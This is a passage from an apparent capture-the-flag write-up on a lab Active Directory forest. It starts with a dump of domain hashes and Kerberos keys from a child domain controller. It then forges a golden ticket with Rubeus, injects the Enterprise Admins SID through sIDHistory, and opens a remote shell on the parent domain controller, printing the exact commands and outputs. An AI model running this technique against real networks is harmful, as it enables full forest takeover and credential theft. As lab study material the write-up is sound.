LAB\LABDC$:aes128-cts-hmac-sha1-96:ad8d9d4948dc22086365ab383785a0b6
LAB\LABDC$:des-cbc-md5:a1ab5b5219d69b4a
LAB\LABDC$:plain_password_hex:a27486e5d31de3eeffc13e509350c523a21acb9ccac4de7011106ef09fc81b12eb00f83153ee08198aced938db8144dca607c2c18d931bf1f43845f8ed656cf792441632eefbfb88ba426bce8c6aaa43476d1f9423c741289d922d2b3e2417ebebc603ee87462a2c6b2d32af6f2b9028fef2aac110a9624b1e14dbc0cfee5efc30bd14fbf37fe894143dc9a50dddb96584323db23bbdfd8f4c1156e7e61d5e7aed1a5b75fefe609363db2984e149b7e3a29077c4d964d12519f9caabf4d95dea0a79bef3eac46cd5dd69ee4d53e66d9c2d7f30502e99fca53190e300efd2a9e14fbda318a399f74b11adadb84957cd0a
LAB\LABDC$:aad3b435b51404eeaad3b435b51404ee:2e1b1bcabeb4f62d6bbea5366543f4ff:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x34bbd503801a432eba3e789e4452f494b5b41342
dpapi_userkey:0xce5eac76a1bfb440011bc4b5d0c14e2b1f842e13
[*] NL$KM
0000 B6 96 C7 7E 17 8A 0C DD 8C 39 C2 0A A2 91 24 44 ...~.....9....$D
0010 A2 E4 4D C2 09 59 46 C0 7F 95 EA 11 CB 7F CB 72 ..M..YF........r
0020 EC 2E 5A 06 01 1B 26 FE 6D A7 88 0F A5 E7 1F A5 ..Z...&.m.......
0030 96 CD E5 3F A0 06 5E C1 A5 01 A1 CE 8C 24 76 95 ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:75878369ad33f35b7070ca854100bc07:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c7a03c565c68c6fac5f8913fab576ebd:::
lab.trusted.vl\rsmith:1104:aad3b435b51404eeaad3b435b51404ee:30ef48d2054363df9244bc0d476e93dd:::
lab.trusted.vl\ewalters:1106:aad3b435b51404eeaad3b435b51404ee:56d93bd5a8250652c7430a4467a8540a:::
lab.trusted.vl\cpowers:1107:aad3b435b51404eeaad3b435b51404ee:322db798a55f85f09b3d61b976a13c43:::
0x5001:2101:aad3b435b51404eeaad3b435b51404ee:eadbd189f745c308a95fbee09ecf63d3:::
LABDC$:1000:aad3b435b51404eeaad3b435b51404ee:2e1b1bcabeb4f62d6bbea5366543f4ff:::
TRUSTED$:1103:aad3b435b51404eeaad3b435b51404ee:fdb9239325aed982da5f521116ffbcaf:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:ef0dd1293ef26fdcb054dfecd324e272037f8af708bd2d6289d4010075605eb3
Administrator:aes128-cts-hmac-sha1-96:8487e135528f40d60c99a45b071bbf86
Administrator:des-cbc-md5:b64aef752657b3c8
krbtgt:aes256-cts-hmac-sha1-96:c930ddb15c3f84aafa01e816abc1112e38430b574ae3fcdd019e77bc906494aa
krbtgt:aes128-cts-hmac-sha1-96:db0b41cedf222df3808858fc41bb0c02
krbtgt:des-cbc-md5:0e89167916c134ad
lab.trusted.vl\rsmith:aes256-cts-hmac-sha1-96:b1dd0c20df2dc7638ded51d85ba03682ea308444b4121a10b8e4fa3c24872a41
lab.trusted.vl\rsmith:aes128-cts-hmac-sha1-96:631ba36ba1aaf36135ba4b382dd41590
lab.trusted.vl\rsmith:des-cbc-md5:ae892f45c12fbc5e
lab.trusted.vl\ewalters:aes256-cts-hmac-sha1-96:6408f007a75c725b882a69e6cf22a2218f7ac4d6ddce9f4fb109ae5690472b90
lab.trusted.vl\ewalters:aes128-cts-hmac-sha1-96:bcc44f6ca3403c468757c8cd470d4eb3
lab.trusted.vl\ewalters:des-cbc-md5:86617f4046586410
lab.trusted.vl\cpowers:aes256-cts-hmac-sha1-96:cfd7dce3d0c1a17ae08fc653769ddd382b116b3708197f5d251764dab318d39e
lab.trusted.vl\cpowers:aes128-cts-hmac-sha1-96:413bcdb4a908e53f133a9c660006c0b9
lab.trusted.vl\cpowers:des-cbc-md5:32ab807a018ac89d
0x5001:aes256-cts-hmac-sha1-96:292edbdda5879fe0ac6de4ceef1f2736d10e658f3dccae03aa4fd1cb69701917
0x5001:aes128-cts-hmac-sha1-96:cfa272f2a20017a2f9157ab626dd69e3
0x5001:des-cbc-md5:d5f7803e6d3b4f45
LABDC$:aes256-cts-hmac-sha1-96:66314ebc733a8e2c7ad1981df445e830b86708fa0f30b37d5fb5af648c74c7ed
LABDC$:aes128-cts-hmac-sha1-96:ad8d9d4948dc22086365ab383785a0b6
LABDC$:des-cbc-md5:19ef9e9dadb994f7
TRUSTED$:aes256-cts-hmac-sha1-96:5d0662699bd569757e26309c9456678dd0b40d78180383901833bc58ee0fefe5
TRUSTED$:aes128-cts-hmac-sha1-96:f8cf982ff24fa7ff66a6aff2b078efa1
TRUSTED$:des-cbc-md5:64c72cb6e3bace79
[*] Cleaning up... OK, there are 3 domain user in our child domain. (lab.trusted.vl)
Also, there is a parent domain. (trusted.vl)
We just got access to child domain DC and its own users. We are free to create an TGT ticket to access Parent Domain’s services. If we can inject our privileged group RID to TGT, we will be accessing any parent domain’s services as privileged user. So, this is a “sIDHistory” injection attack. So basically, we are aiming to create a golden TGT that will use in parent domain. That’s a golden TGT with abused sIDHistory property.
What we need to create a TGT:
- Impersonated username
- Current domain name
- Current domain’s “krbtgt” account’s NT hash (It’s the same as RC4 key.)
- Current domain’s SID
- Impersonated group RID
Tip: In active directory environments, forest is a security boundary by design.
Tip: Machine accounts’ password are set by Windows and machine accounts ends with $ sign.
Tip: As always, “krbtgt” account’s NT hash is used to create TGT by design.
We use “Rubeus.exe” to create an inter-realm TGT ticket.
Firstly, find required values to use in parameters.
These parameters are executed on RDP client.
PS C:\Users\0x5001\Desktop> (Get-ADDomain).DomainSID.Value
S-1-5-21-2241985869-2159962460-1278545866
PS C:\Users\0x5001\Desktop> PS C:\Users\0x5001\Desktop> Get-ADGroup -Server trusted.vl -Filter *
DistinguishedName : CN=Administrators,CN=Builtin,DC=trusted,DC=vl
GroupCategory : Security
GroupScope : DomainLocal
Name : Administrators
ObjectClass : group
ObjectGUID : 52f8332f-e6c7-4e2f-aee8-acb59c82a0bf
SamAccountName : Administrators
SID : S-1-5-32-544
DistinguishedName : CN=Users,CN=Builtin,DC=trusted,DC=vl
GroupCategory : Security
GroupScope : DomainLocal
Name : Users
ObjectClass : group
ObjectGUID : 27e4e80d-6222-4c10-a65a-dec032de51c6
SamAccountName : Users
SID : S-1-5-32-545
<SNIPPED>
DistinguishedName : CN=Enterprise Admins,CN=Users,DC=trusted,DC=vl
GroupCategory : Security
GroupScope : Universal
Name : Enterprise Admins
ObjectClass : group
ObjectGUID : 9e72548e-1fda-486c-b426-6bcb7f171253
SamAccountName : Enterprise Admins
SID : S-1-5-21-3576695518-347000760-3731839591-519
<SNIPPED>Current Domain SID: S-1-5-21-2241985869-2159962460-1278545866
“Enterprise Admins” Group SID: S-1-5-21-3576695518-347000760-3731839591-519
RC4 key: c7a03c565c68c6fac5f8913fab576ebd (“krbtgt” account’s NT hash)
PS C:\Users\0x5001\Desktop> .\Rubeus.exe golden /rc4:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /user:Administrator /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Build TGT
[*] Building PAC
[*] Domain : LAB.TRUSTED.VL (LAB)
[*] SID : S-1-5-21-2241985869-2159962460-1278545866
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ExtraSIDs : S-1-5-21-3576695518-347000760-3731839591-519
[*] ServiceKey : C7A03C565C68C6FAC5F8913FAB576EBD
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : C7A03C565C68C6FAC5F8913FAB576EBD
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : krbtgt
[*] Target : lab.trusted.vl
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for '[email protected]'
[*] AuthTime : 9/5/2024 9:41:11 PM
[*] StartTime : 9/5/2024 9:41:11 PM
[*] EndTime : 9/6/2024 7:41:11 AM
[*] RenewTill : 9/12/2024 9:41:11 PM
[*] base64(ticket.kirbi):
doIFZzCCBWOgAwIBBaEDAgEWooIEXjCCBFphggRWMIIEUqADAgEFoRAbDkxBQi5UUlVTVEVELlZMoiMw
IaADAgECoRowGBsGa3JidGd0Gw5sYWIudHJ1c3RlZC52bKOCBBIwggQOoAMCARehAwIBA6KCBAAEggP8
0tIj1r6SL6txOeGduKXcz1OPf9XHdPY4zY3ydS6QMfacG7CHBr2tYDbW8qSzxZS7jm69DnIjYWL/1FuB
j0t2yb8+j0IYgblcyDEf+DXy5vP6uD0f7b/whe2GALCah5/nGVFiEma8NfGVplL7XylL70Y3S1rgPj4N
NB8xF59afiT+ooufkZKhWrb99awlPXZdJU5cVQ3wOCyPV/8jNICxXakoSWgCRSlqsz+Kg223Hrv52RWP
xUV2NEXJ8C8Sc7dwxYUI0rXhdJGJ7x8XzpqV07B1Ksrk5OdnKPJhQ/ur62F+rcpjKCyV+9i4Wrm2u+LE
c7TFQbdK/ArTBCsPwoW1wHQH4+/YnbVPREIn7zKhnC6uZltYBAwTCR0zHf94K13I5tpUNhP+2mtUL7nT
LeVzJiTaMYn5lfZgQVzMgK9vxa9mxCUcesWdcJlPA1nsFDrVA3aQEW2waKGHUbu+1XDgGQM/oZzIYsHW
Ic6tvtBnCAYB0e78wKzepi4ZHHI0W1g+gn1BGAAaBEEs400AzWZL+rDg81VgAkHtFLALnu+jMAQw1Vj/
iFkWCVZD3tWL8AhmKTXR8o5fwa47LnWFB/YF1KPKhaZ8bDKSq4OHdACfiMgD1a4K58sjhbRrB9jq5Jl+
lAbTN/CWMRefWhJTgj28D/Q+0Ild+DlG9cLkydZQf2c03c6EkMzlHxkvB8075fHUHkh2zzfiA0qQo6YC
1IBlE8u4GcGgwg2hgERhzXczyZ2myQeak8wukygNtAaxiWglipq+ls5I1mYrGcbl7fpHpBKc6MsB9hVM
ZhVsEYHQZZHEvnibDSfDzjmzHXu/kf4R2y6fwy9GqstgrwcA9sjzMPrU+x6dcp4Q79+PxOIP0QIz4z7I
9U7LHypU+ciL/mFSBJ84UPJBCOsn6Eywy4WEzSer803hKAQ98c0B6I8eA1PCPhbp/Gx4Lf3DFJEJJvg4
p8MRuKR7+C+PVoJPp2s0J3hxQLjZITkyFsWGelM0pWeIzS+M5vVxyl8dIRTNlkTjgbQ4qmFZccwOYXRM
bvguk1bii8cD7IHJCB8JUMJfq9OYOtqECOgIyivPWx5gQ/mBhQe5PvB01FlaM6TxsYAa08fU6vh638qI
JpEUK7aJWrc4kb0jfQAjAVq8ryu7qITVyfF1uhgJLVbKQhFS8L0Vd1efSe4DEYEW6g1B7jJFR4BFeKBR
aE1HaO1rk+wBlbnTpqgezQMFC98vT+Aj0qm8GrT2coMLSoHXV5KGcp7+eN0El5t59gxr/rc1gaYREqy4
8eAvJJ8Ek0fIFWogv8nPnJCKJyqsNjhAeXRdMY4dkHx/3ttyJCWObSEh/Lp0i/9kBKw3Yxr4uV4Itmvl
o4H0MIHxoAMCAQCigekEgeZ9geMwgeCggd0wgdowgdegGzAZoAMCARehEgQQT7w6NypTYX5pUOMngRrH
cKEQGw5MQUIuVFJVU1RFRC5WTKIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEDgAACkERgP
MjAyNDA5MDUyMTQxMTFapREYDzIwMjQwOTA1MjE0MTExWqYRGA8yMDI0MDkwNjA3NDExMVqnERgPMjAy
NDA5MTIyMTQxMTFaqBAbDkxBQi5UUlVTVEVELlZMqSMwIaADAgECoRowGBsGa3JidGd0Gw5sYWIudHJ1
c3RlZC52bA==
[+] Ticket successfully imported!
PS C:\Users\0x5001\Desktop> klist
Current LogonId is 0:0x93728
Cached Tickets: (1)
#0> Client: Administrator @ LAB.TRUSTED.VL
Server: krbtgt/lab.trusted.vl @ LAB.TRUSTED.VL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 9/5/2024 21:41:11 (local)
End Time: 9/6/2024 7:41:11 (local)
Renew Time: 9/12/2024 21:41:11 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
PS C:\Users\0x5001\Desktop> winrs -r:trusteddc.trusted.vl cmd
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.
C:\Users\Administrator.LAB>
C:\Users\Administrator.LAB>
C:\Users\Administrator.LAB>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . : eu-central-1.compute.internal
IPv4 Address. . . . . . . . . . . : 10.10.194.133
Subnet Mask . . . . . . . . . . . : 255.255.255.240
Default Gateway . . . . . . . . . : 10.10.194.129
C:\Users\Administrator.LAB>hostname
hostname
trusteddc
C:\Users\Administrator>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
================= =============================================
lab\administrator S-1-5-21-2241985869-2159962460-1278545866-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================== ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LAB\Group Policy Creator Owners Group S-1-5-21-2241985869-2159962460-1278545866-520
LAB\Domain Admins Group S-1-5-21-2241985869-2159962460-1278545866-512
Unknown SID type S-1-5-21-2241985869-2159962460-1278545866-519
Unknown SID type S-1-5-21-2241985869-2159962460-1278545866-518
TRUSTED\Enterprise Admins Group S-1-5-21-3576695518-347000760-3731839591-519 Mandatory group, Enabled by default, Enabled group
TRUSTED\Denied RODC Password Replication Group Alias S-1-5-21-3576695518-347000760-3731839591-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-12288That’s it. We are in Enterprise Admins group!